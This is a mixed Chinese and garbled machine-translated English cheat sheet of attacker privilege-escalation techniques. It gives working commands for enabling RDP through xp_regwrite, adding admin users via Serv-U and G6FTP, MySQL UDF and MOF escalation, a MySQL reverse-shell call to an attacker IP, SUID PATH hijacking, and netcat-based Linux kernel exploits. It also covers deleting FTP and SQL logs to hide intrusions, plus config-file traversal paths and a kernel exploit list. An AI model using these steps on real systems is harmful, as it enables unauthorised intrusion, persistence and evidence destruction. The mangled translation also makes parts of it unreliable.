Network Security (eight mention the right)

In the case of the Trojans do not know the password can be written on the back? Profile = a (not always successfully)
http://1.11.1.1:8000/2.asp?profile=a

Windnows
the User (ordinary)
Administrator (Administrator)
System (control)
of the three is not fully contained, administrator must contain user, system intersect with the other two portions of
Linux
the User
root

Improve the implementation of the authority

For site testing, when testing a Web site, permissions have been won by webshell server permissions to change
permissions wenshell are not met, so to put right

Usually a script execute permissions:
ASP / PHP mention the right to anonymity

aspx user权限

jsp通常是系统权限

Mention the right reasons:
like to win a website, but a good site protection, and there are sites on the same server b, b loopholes, to cross a website, put it right

---

Find 3389 available directly create a new user to login

Forced on 3389:
1. Upload Trojan file, getshell chopper connection, using a virtual interface enter the command:
Exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE ',' the SYSTEM \ CurrentControlSet \ Control \ Terminal Sever ',' fDenyTSConnections', 'REG_DWORD' , 0; -
the command requires certain privileges, most of the time the developer does not disable this part of the authority, and therefore very easy to use

2. 打开记事本，编辑内容如下：
echo[Components]>c:\sql
echoTSEnable=on>>c:\sql
sysocmgr/i:c:\winnt\inf\sysoc.inf/u:c:\sql/q
编辑好后存为BAT 文件，上传至肉鸡，执行。
这里值得注意的是要确定winnt 是否在c 盘，如果在其他盘则需要改动。

关闭3389:
exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,‘SYSTEM\CurrentControlSet\Control\Terminal Sever’,‘fDenyTSConnections’,‘REG_DWORD’,1;–

windows provide the right:
connect Malaysia and Malaysian operations within
third-party software provide the right to
the FTP:
server-u
1. Edit permission
to check for write permission to modify server-u servUDaemon.ini default installation directory under
increased user
follow configuration file format, add a step
in the password step note with salt
first look at what salt is
sandwiched fill salt in MD5 password, transformed
and then fill out the password, fill in again in front of the same salt
gw123-> fb289605d3e6ba84fecb32b0aa2f83cb
these to fill in a bunch of gwfb289605d3e6ba84fecb32b0aa2f83cb password at
connection ftp
execute the command
quote the user Site Exec NET cracer cracer.com/add create a user and password
quote site exec net localgroup adinistrators cracer / add user-mentioned administrator rights

			2. 无修改权限
			只能暴力破解密码---md5

			3.溢出提权
			再大马的选项有提权 ，net user dkill 123 /add 设置好密码完事

			4.管理员密码被修改
			在创建用户后，如果密码被修改，且利用的是server-u提权，那么我们可以找到						servUAdmin.exe文件，进行下载
			随后再利用  代码审计中的c32，将.exe直接拖进来,以16进制的形式查看
			然后搜索时用ansi字符串搜索管理员的账号，就可以找到密码

		g6ftp: 
			下载管理配置文件，将administrator管理密码破解
			使用lcx端口转发（默认只允许本机连接）
			lcx.exe -tran 8027 127.0.0.1 8021
			使用客户端以管理员用户登录
			创建客户并设置权限和执行的批处理文件
			上传批处理
			以创建的普通用户登陆ftp
			执行命令 quote site x.bat
			x.bat 内容为添加系统用户 提权
		filezilla
		
	远程管理软件
	pcanywhere\radmin\vnc

溢出提权

启动项提权

利用pr提权
pr文件的话，要上传到垃圾站的目录/站点根目录，所以再大马中要找到目录位置，
c:\recycle\pr.exe
上传pr,进行提权，随后上传破解hash软件

Database mention the right
mssql mention the right to
install the components
sa account acquisition, to view config.asp, conn, asp and other documents
open 3389
to create a user
with elevated privileges
to complete
MYSQL database mention the right to
use environment variables to mention the right
look for the file system can operate in the
execution command
$ find / -perm -u = s -type f 2> / dev / null
whether to use the file command to view the file executable
file msgmike (file after the search)
executable file
./msgmike
set the environment variable $ pash bash the
new cat, add execution permissions
Touch CAT
echo "/ bin / SH"> CAT
when you run the command again ./msgmike
./msgmike
then execute export PATH = '.'
privilege escalation

	udf提权
		获取到对方的mysql数据库下的root账号，密码
		1.查看网站源码里面的数据库配置文件(inc,coon,config.sql,common,data)
		2.查看数据库安装路径下的user.myd(/data/mysql/)
		3.暴力破解mysql密码 破解3306端口入侵
	***************************************************************************************
		知道数据库用户名。密码
		利用testa.php大马
		利用uname -r 查询版本 32 64
		将权限提升---udf.txt查找对应的版本
		复制到mysql语句执行中去
		没有写入权限的话，提前进行设置 chmod 777 -R /usr/lib/mysql/plugin/
		然后利用导入的库文件创建函数
		create function sys_eval returns string soname "mysqludf.so";
		执行命令
		select sys_eval('whoami');
	*********************************************************************************
		数据库开外连
		命令执行
		Grant all privileges on *.* to 'root'@'%' identified by 'root' with grant option;
		然后mysql提权工具
		
	udf提权原理：
		通过root权限导出udf.dll到系统目录下，可以通过udf.dll调用执行cmd
		5.1以上的版本需要导到mysql安装目录lib\plugin\
		以下的版本导到c:\winnt\udf.dll  2000
			      c:\windows\udf.dll  2003


	mof提权（相当牛逼那种）
		1.上传mof.php 输入登录账号 密码，发送命令，提权

		2. 利用大马上传x.mof，并在大马中使用select 命令使得x.mof导出到正确的位置
		select load_file('c:/wmpub/nullevt.mof') into dumpfile 			'c:/windows/system32/wbem/mof/nullevt.mof'
		开启数据库外联
		Grant all privileges on *.* to 'root'@'%' identified by 'cc4789.com' with grant option;

	反弹端口提权:
		1. 利用mysql客户端工具连接mysql服务器，然后执行命令
		mysql.exe -h 172.16.10.11 -uroot -p
		Enter password:
		mysql > \. c:\mysql.txt
		mysql > select backshell("YourIP",2010);

删除cmd_shell组件
EXEC sp_configure ‘show advanced options’,1
GO
RECONFIGURE
GO
EXEC sp_configure ‘xp_cmdshell’,0
GO
RECONFIGURE
GO

linux mention the right:
uname -r core edition
and then find the corresponding privilege elevation linuxEXP horse
after uploading the horse to move to the tmp directory
cp / var / the WWW / HTML / AC / the TEMP / AC
linux mention the right - bounce port to connect themselves
nc - lpvn 12345 then click start connection
in its own window to compile
gcc ac generate a.out
run a.out ./a.out

---

What are users in the Administrators group?

net localgroup administrators

Get-LocalGroupMember administrator | ft Name, PrincipalSource

Is there a connection to another host network connections?

netstat -ano

The firewall is turned on? If it is configured and how?

netsh firewall show state

netsh firewall show configuration

netsh advfirewall firewall show rule name = all

netsh advfirewall export“firewall.txt”

What are some of the IIS log files in the directory?

C: \ The Inetpub \ logs \ LogFiles file \ W3SVC1 \ u_ex [YYMMDD] of .log

C: \ The Inetpub \ logs \ LogFiles file \ W3SVC2 \ u_ex [YYMMDD] of .log

C: \ The Inetpub \ logs \ LogFiles file \ FTPSVC1 \ u_ex [YYMMDD] of .log

C: \ The Inetpub \ logs \ LogFiles file \ FTPSVC2 \ u_ex [YYMMDD] of .log

Whether XAMPP, Apache or PHP installation? Anything of XAMPP, Apache or PHP configuration file?

dir / s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf

Get-Childitem -Path C：\ -Include php.ini，httpd.conf，httpd-xampp.conf，my.ini，my.cnf -File -Recurse -ErrorAction SilentlyContinue

Are there any of the Apache web log system?

dir / s access.log error.log

Get-Childitem -Path C：\ -Include access.log，error.log -File -Recurse -ErrorAction SilentlyContinue

Are any interesting file system? It may be in the user directory (desktop, documents, etc.)?

dir / s * pass * == * vnc * == * .config * 2> nulGet-Childitem -Path C：\ Users \ -Include * password ， vnc ，。config -File -Recurse -ErrorAction SilentlyContinue

MSFTP processing server log:

In the "C: \ WINNT \ system32 \ \ MSFTPSVC1 \ LogFiles" There are at ex011120.log / ex011121.log / ex011124.log three files, delete ex0111124.log unsuccessful, display "... the original file is in use."

Of course, you can simply remove "ex011120.log / ex011121.log". And then use Notepad to open "ex0111124.log", after removing some of the contents inside, save, covering exit successfully.

When you stop "MSFTPSVC" service can delete "ex011124.log".

MSSQL Query Analyzer clear connection record:

MSSQL 2000 in the registry as follows:

HKEY_CURRENT_USER \ Software \ Microsoft \ Microsoft SQL Server \ 80 \ Tools \ Client \ PrefServers

Find information deleted then took over.

MSSQL 2005 is in:

C：\ Documents and Settings \ Application Data \ Microsoft \ Microsoft SQL Server \ 90 \ Tools \ Shell \ mru.dat

Various sites profile relative path Daquan:

/config.php

…/…/config.php

…/config.php

…/…/…/config.php

/config.inc.php

./config.inc.php

…/…/config.inc.php

…/config.inc.php

…/…/…/config.inc.php

/conn.php

./conn.php

…/…/conn.php

…/conn.php

…/…/…/conn.php

/conn.asp

./conn.asp

…/…/conn.asp

…/conn.asp

…/…/…/conn.asp

/config.inc.php

./config.inc.php

…/…/config.inc.php

…/config.inc.php

…/…/…/config.inc.php

/config/config.php

…/…/config/config.php

…/config/config.php

…/…/…/config/config.php

/config/config.inc.php

./config/config.inc.php

…/…/config/config.inc.php

…/config/config.inc.php

…/…/…/config/config.inc.php

/config/conn.php

./config/conn.php

…/…/config/conn.php

…/config/conn.php

…/…/…/config/conn.php

/config/conn.asp

./config/conn.asp

…/…/config/conn.asp

…/config/conn.asp

…/…/…/config/conn.asp

/config/config.inc.php

./config/config.inc.php

…/…/config/config.inc.php

…/config/config.inc.php

…/…/…/config/config.inc.php

/data/config.php

…/…/data/config.php

…/data/config.php

…/…/…/data/config.php

/data/config.inc.php

./data/config.inc.php

…/…/data/config.inc.php

…/data/config.inc.php

…/…/…/data/config.inc.php

/data/conn.php

./data/conn.php

…/…/data/conn.php

…/data/conn.php

…/…/…/data/conn.php

/data/conn.asp

./data/conn.asp

…/…/data/conn.asp

…/data/conn.asp

…/…/…/data/conn.asp

/data/config.inc.php

./data/config.inc.php

…/…/data/config.inc.php

…/data/config.inc.php

…/…/…/data/config.inc.php

/include/config.php

…/…/include/config.php

…/include/config.php

…/…/…/include/config.php

/include/config.inc.php

./include/config.inc.php

…/…/include/config.inc.php

…/include/config.inc.php

…/…/…/include/config.inc.php

/include/conn.php

./include/conn.php

…/…/include/conn.php

…/include/conn.php

…/…/…/include/conn.php

/include/conn.asp

./include/conn.asp

…/…/include/conn.asp

…/include/conn.asp

…/…/…/include/conn.asp

/include/config.inc.php

./include/config.inc.php

…/…/include/config.inc.php

…/include/config.inc.php

…/…/…/include/config.inc.php

/inc/config.php

…/…/inc/config.php

…/inc/config.php

…/…/…/inc/config.php

/inc/config.inc.php

./inc/config.inc.php

…/…/inc/config.inc.php

…/inc/config.inc.php

…/…/…/inc/config.inc.php

/inc/conn.php

./inc/conn.php

…/…/inc/conn.php

…/inc/conn.php

…/…/…/inc/conn.php

/inc/conn.asp

./inc/conn.asp

…/…/inc/conn.asp

…/inc/conn.asp

…/…/…/inc/conn.asp

/inc/config.inc.php

./inc/config.inc.php

…/…/inc/config.inc.php

…/inc/config.inc.php

…/…/…/inc/config.inc.php

The index.php

./index.php

…/…/index.php

…/index.php

…/…/…/index.php

/index.asp

./index.asp

…/…/index.asp

…/index.asp

…/…/…/index.asp

Daniel summary window mention the right to mastery collection

Vulnerability List

#Security Bulletin #KB #Description #Operating System

CVE-2017-0213 [Windows COM privilege elevation vulnerability] (Windows 10 / 8.1 / 7/2016 / 2010/2008)

MS17-010 [KB4013389] [Windows kernel-mode driver] (Windows 7/2008/2003 / XP)

MS16-135 [KB3199135] [Windows kernel-mode driver] (2016)

MS16-098 [KB3178466] [kernel driver] (Win 8.1)

MS16-075 [KB3164038] [Hot Potato]（2003/2008/7/8/2012）

MS16-032 [KB3143141] [secondary logon process] (2008/7/8/10/2012)

MS16-016 [KB3136041] [WebDAV]（2008 / Vista / 7）

MS15-097 [KB3089656] [Remote Execution Code] (win8.1 / 2012)

MS15-076 [KB3067505] [RPC]（2003/2008/7/8/2012）

MS15-077 [KB3077657] [ATM]（XP / Vista / Win7 / Win8 / 2000/2003/2008 / 2012）

MS15-061 [KB3057839] [kernel driver] (2003/2008/7/8/2012)

MS15-051 [KB3057191] [Windows kernel-mode driver] (2003/2008/7/8/2012)

MS15-010 [KB3036220] [kernel driver] (2003/2008/7/8)

MS15-015 [KB3031432] [kernel driver] (Win7 / 8 / 8.1 / 2012 / RT / 2012 R2 / 2008 R2)

MS15-001 [KB3023266] [kernel driver] (2008/2012/7/8)

MS14-070 [KB2989935] [kernel driver] (2003)

MS14-068 [KB3011780] [domain privilege escalation] (2003/2008/2012/7/8)

MS14-058 [KB3000061] [Win32k.sys]（2003/2008/2012/7/8）

MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8)

MS14-002 [KB2914368] [NDProxy]（2003 / XP）

MS13-053 [KB2850851] [win32k.sys]（XP / Vista / 2003/2008 / win 7）

MS13-046 [KB2840221] [dxgkrnl.sys]（Vista / 2003/2008 / 2012/7）

MS13-005 [KB2778930] [kernel-mode driver] (2003/2008 / 2012 / win7 / 8)

MS12-042 [KB2972621] [Service Bus] (2008/2012 / win7)

MS12-020 [KB2671387] [RDP]（2003/2008/7 / XP）

MS11-080 [KB2592799] [AFD.sys] (2003 / XP)

MS11-062 [KB2566454] [NDISTAPI]（2003 / XP）

MS11-046 [KB2503665] [AFD.sys]（2003/2008/7 / XP）

MS11-011 [KB2393802] [kernel driver] (2003/2008/7 / XP / Vista)

MS10-092 [KB2305420] [Task Scheduler] (2008/7)

MS10-065 [KB2267960] [FastCGI] (IIS 5.1,6.0,7.0 and 7.5)

MS10-059 [KB982799] [ACL-Churraskito] (2008/7 / Vista)

MS10-048 [KB2160329] [win32k.sys] (XP SP2 and SP3 / 2003 SP2 / Vista SP1 and SP2 / 2008 Gold & SP2 & R2 / Win7)

MS10-015 [KB977165] [KiTrap0D]（2003/2008/7 / XP）

MS09-050 ?? [KB975517] [remote code execution] (2008 / Vista)

MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0)

MS09-012 [KB959454] [Chimichurri]（Vista / win7 / 2008 / Vista）

MS08-068 [KB957097] [remote code execution] (2000 / XP)

MS08-067 [KB958644] [remote code execution] (Windows 2000 / XP / Server 2003 / Vista / Server 2008)

MS08-025 [KB941693] [Win32.sys]（XP / 2003/2008 / Vista）

MS06-040 [KB921883] [remote code execution] (2003 / xp / 2000)

MS05-039 [KB899588] [PnP service] (Win 9X / ME / NT / 2000 / XP / 2003)

MS03-026 [KB823980] [RPC Interface Buffer Overrun] (/ NT / 2000 / XP / 2003)

Download the project; https://github.com/SecWiki/windows-kernel-exploits